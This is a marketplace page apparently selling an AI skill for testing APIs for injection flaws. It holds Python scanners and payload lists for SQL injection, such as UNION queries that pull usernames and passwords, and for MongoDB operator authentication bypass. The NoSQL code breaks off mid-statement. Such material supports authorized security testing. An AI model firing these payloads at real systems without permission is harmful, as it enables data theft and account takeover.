Claude
Skills
Sign in
Back

exploiting-api-injection-vulnerabilities

Included with Lifetime
$97 forever

Tests APIs for injection vulnerabilities including SQL injection, NoSQL injection, OS command injection, LDAP injection, and Server-Side Request Forgery (SSRF) through API parameters, headers, and request bodies. The tester crafts malicious payloads targeting different backend technologies and injection contexts to extract data, execute commands, or access internal services. Maps to OWASP API8:2023 Security Misconfiguration and API7:2023 SSRF. Activates for requests involving API injection testing, SQLi in APIs, NoSQL injection, SSRF testing, or API input validation assessment.

Backend & APIs · api-security · owasp · injection · sqli · nosql · ssrf · command-injection · scripts

What this skill does

# Exploiting API Injection Vulnerabilities

## When to Use

- Testing API endpoints that accept user input for database queries, system commands, or external requests
- Assessing APIs that interact with SQL databases, NoSQL stores (MongoDB, Redis), LDAP directories, or external URLs
- Evaluating input validation and parameterized query usage across all API endpoints
- Testing for SSRF where API parameters accept URLs or hostnames that trigger server-side requests
- Identifying injection points in headers, path parameters, query strings, and JSON/XML request bodies

**Do not use** without written authorization. Injection testing can modify or destroy data and compromise backend systems.

## Prerequisites

- Written authorization specifying target API and backend systems in scope
- Python 3.10+ with `requests` library
- SQLMap for automated SQL injection detection and exploitation
- Burp Suite Professional with Active Scan capabilities
- Knowledge of the backend database technology (MySQL, PostgreSQL, MongoDB, Redis)
- Isolated test environment to avoid production data corruption


> **Legal Notice:** This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

## Workflow

### Step 1: Injection Point Identification

```python
import requests
import json
import urllib.parse

# Root of the API under test; every endpoint below is relative to it.
BASE_URL = "https://target-api.example.com/api/v1"

# Headers sent with every request; replace <token> with a real bearer token.
headers = {
    "Authorization": "Bearer <token>",
    "Content-Type": "application/json",
}

# Resources whose trailing path segment is attacker-controlled.
_PATH_RESOURCES = ("users", "products", "orders")

# GET endpoints whose query-string values are attacker-controlled.
_QUERY_TEMPLATES = (
    "/users?search={input}",
    "/products?sort={input}&order={input}",
    "/products?category={input}",
    "/search?q={input}",
)

# POST endpoints paired with the JSON body fields to inject into.
_BODY_TARGETS = (
    ("/auth/login", ("username", "password")),
    ("/users", ("name", "email")),
    ("/search", ("query", "filters")),
    ("/webhook", ("url", "callback_url")),
)

# Map all input points across the API. "{input}" marks where a payload goes.
injection_points = [
    # Path parameters
    *(
        {"type": "path", "method": "GET", "url": f"/{resource}/{{input}}"}
        for resource in _PATH_RESOURCES
    ),
    # Query parameters
    *(
        {"type": "query", "method": "GET", "url": template}
        for template in _QUERY_TEMPLATES
    ),
    # JSON body parameters
    *(
        {"type": "body", "method": "POST", "url": url, "fields": list(fields)}
        for url, fields in _BODY_TARGETS
    ),
    # Header parameters
    {
        "type": "header",
        "method": "GET",
        "url": "/users/me",
        "headers": ["X-Forwarded-For", "Referer", "User-Agent"],
    },
]
```

### Step 2: SQL Injection Testing

```python
# SQL injection payloads for different contexts.
# Each category is kept in its own list and assembled into SQL_PAYLOADS below;
# category order and payload order are significant because the scanner
# iterates them in sequence.

# Quick probes: stray quotes, boolean tautologies, a UNION and two delays.
_DETECTION_PAYLOADS = [
    "'",
    '"',
    "' OR '1'='1",
    '" OR "1"="1',
    "1 OR 1=1",
    "' OR 1=1--",
    "' UNION SELECT NULL--",
    "1; WAITFOR DELAY '0:0:5'--",
    "1' AND SLEEP(5)--",
    "1)) OR 1=1--",
]

# UNION SELECT probes (three-column variants plus a schema listing).
_UNION_PAYLOADS = [
    "' UNION SELECT NULL,NULL,NULL--",
    "' UNION SELECT 1,2,3--",
    "' UNION SELECT username,password,NULL FROM users--",
    "-1 UNION SELECT table_name,NULL,NULL FROM information_schema.tables--",
]

# Probes that embed version() in an expression intended to fail.
_ERROR_PAYLOADS = [
    "' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT version()), 0x7e))--",
    "' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--",
]

# Probes that request a 5-second delay, in several dialect spellings.
_TIME_PAYLOADS = [
    "' AND SLEEP(5)--",
    "'; WAITFOR DELAY '0:0:5'--",
    "' AND (SELECT * FROM (SELECT(SLEEP(5)))a)--",
    "1; SELECT pg_sleep(5)--",
]

SQL_PAYLOADS = {
    "detection": _DETECTION_PAYLOADS,
    "union_based": _UNION_PAYLOADS,
    "error_based": _ERROR_PAYLOADS,
    "time_based": _TIME_PAYLOADS,
}

import time

# Substrings (lower-case) whose presence in a response body is treated as a
# sign that a database error message leaked to the client.
_SQL_ERROR_KEYWORDS = (
    "sql syntax", "mysql", "postgresql", "sqlite",
    "oracle", "unterminated", "syntax error",
    "unexpected end", "quoted string", "invalid input",
)

# Upper-case markers identifying payloads that ask the database to pause.
# "SLEEP" also matches pg_sleep; "WAITFOR DELAY" covers the remaining delay
# payloads in SQL_PAYLOADS.
_DELAY_MARKERS = ("SLEEP", "WAITFOR DELAY")

_SUPPORTED_PARAM_TYPES = ("query", "body", "path")


def _send_probe(endpoint, param_name, param_type, value):
    """Send one request with *value* placed in the chosen parameter slot."""
    if param_type == "query":
        return requests.get(f"{BASE_URL}{endpoint}", headers=headers,
                            params={param_name: value}, timeout=15)
    if param_type == "body":
        return requests.post(f"{BASE_URL}{endpoint}", headers=headers,
                             json={param_name: value}, timeout=15)
    # "path": substitute the URL-quoted value for the {input} placeholder.
    path = endpoint.replace("{input}", urllib.parse.quote(value))
    return requests.get(f"{BASE_URL}{path}", headers=headers, timeout=15)


def test_sql_injection(endpoint, param_name, param_type="query"):
    """Test a parameter for SQL injection.

    Every payload in SQL_PAYLOADS is sent once and the response is checked
    for three indicators: a database error keyword in the body, a response
    delayed by a delay payload, and a 200 response to a UNION payload whose
    body differs from a benign baseline.

    Args:
        endpoint: Path relative to BASE_URL; for ``param_type="path"`` it
            must contain the ``{input}`` placeholder.
        param_name: Query-string key or JSON body field that receives the
            payload (unused for ``"path"``).
        param_type: One of ``"query"``, ``"body"`` or ``"path"``.

    Returns:
        A list of finding dicts with the keys ``endpoint``, ``param``,
        ``category``, ``payload``, ``indicators``, ``status`` and ``time``.

    Raises:
        ValueError: If ``param_type`` is not a supported value.
    """
    if param_type not in _SUPPORTED_PARAM_TYPES:
        raise ValueError(
            f"param_type must be one of {_SUPPORTED_PARAM_TYPES}, got {param_type!r}"
        )

    results = []

    # One benign request, sent the same way as the payloads, gives the
    # reference body and reference latency for the comparisons below.
    baseline_text = None
    baseline_elapsed = 0.0
    baseline_start = time.monotonic()
    try:
        baseline_text = _send_probe(endpoint, param_name, param_type, "test").text
        baseline_elapsed = time.monotonic() - baseline_start
    except requests.RequestException as exc:
        # Without a baseline the UNION comparison is skipped rather than guessed.
        print(f"[SQLi] {endpoint} ({param_name}): baseline request failed - {exc}")

    for category, payloads in SQL_PAYLOADS.items():
        for payload in payloads:
            start = time.monotonic()
            try:
                resp = _send_probe(endpoint, param_name, param_type, payload)
            except requests.RequestException as exc:
                # A single failed request must not abort the remaining payloads.
                print(f"[SQLi] {endpoint} ({param_name}): request failed for {payload!r} - {exc}")
                continue
            elapsed = time.monotonic() - start

            body = resp.text
            body_lower = body.lower()
            payload_upper = payload.upper()

            # Check for SQL injection indicators
            indicators = {
                "error": any(kw in body_lower for kw in _SQL_ERROR_KEYWORDS),
                # Measure the delay relative to the baseline so that a slow
                # endpoint is not mistaken for an injected pause.
                "time_based": (elapsed - baseline_elapsed) > 4.5
                              and any(m in payload_upper for m in _DELAY_MARKERS),
                "union_data": resp.status_code == 200 and len(body) > 0
                              and "UNION" in payload_upper
                              and baseline_text is not None
                              and body != baseline_text,
            }

            if any(indicators.values()):
                triggered = [k for k, v in indicators.items() if v]
                results.append({
                    "endpoint": endpoint,
                    "param": param_name,
                    "category": category,
                    "payload": payload,
                    "indicators": triggered,
                    "status": resp.status_code,
                    "time": f"{elapsed:.1f}s"
                })
                print(f"[SQLi] {endpoint} ({param_name}): {category} - {triggered}")

    return results

# Run the SQL injection checks against the search, product-category and
# login parameters, in that order.
for _endpoint, _param, _kind in (
    ("/search", "q", "query"),
    ("/products", "category", "query"),
    ("/auth/login", "username", "body"),
):
    test_sql_injection(_endpoint, _param, _kind)
```

### Step 3: NoSQL Injection Testing

```python
# NoSQL injection payloads (MongoDB-focused).
# Dict entries are complete JSON login bodies; string entries are JSON text
# that the caller parses and places into a single field.

# MongoDB operator injection in JSON body
_AUTH_BYPASS_BODIES = [
    {"username": {"$ne": ""}, "password": {"$ne": ""}},
    {"username": {"$gt": ""}, "password": {"$gt": ""}},
    {"username": {"$regex": ".*"}, "password": {"$regex": ".*"}},
    {"username": "admin", "password": {"$ne": "wrongpassword"}},
    {"username": {"$in": ["admin", "root", "administrator"]}, "password": {"$ne": ""}},
]

_DATA_EXTRACTION_BODIES = [
    # Enumerate first char
    {"username": {"$regex": "^a"}, "password": {"$ne": ""}},
    {"username": {"$where": "this.username.length > 0"}, "password": {"$ne": ""}},
]

# When input is a string field
_OPERATOR_STRINGS = [
    '{"$gt": ""}',
    '{"$ne": null}',
    '{"$regex": ".*"}',
    '{"$where": "1==1"}',
]

NOSQL_PAYLOADS = {
    "auth_bypass": _AUTH_BYPASS_BODIES,
    "data_extraction": _DATA_EXTRACTION_BODIES,
    "operator_injection_string": _OPERATOR_STRINGS,
}

def test_nosql_injection(endpoint, method="POST"):
    """Test for MongoDB NoSQL injection."""
    results = []

    # Test JSON body operator injection
    for category, payloads in NOSQL_PAYLOADS.items():
        for payload in payloads:
            if isinstance(payload, dict):
                resp = requests.post(f"{BASE_URL}{endpoint}",
                                   headers=headers, json=payload, timeout=10)
            else:
                # Test as string parameter
                resp = requests.post(f"{BASE_URL}{endpoint}",
                                   headers=headers,
                                   json={"username": json.loads(payload), "password": "test"},
                                   timeout=10)

            if resp.status_code == 200:
                resp_data = resp.json() if r

Related in Backend & APIs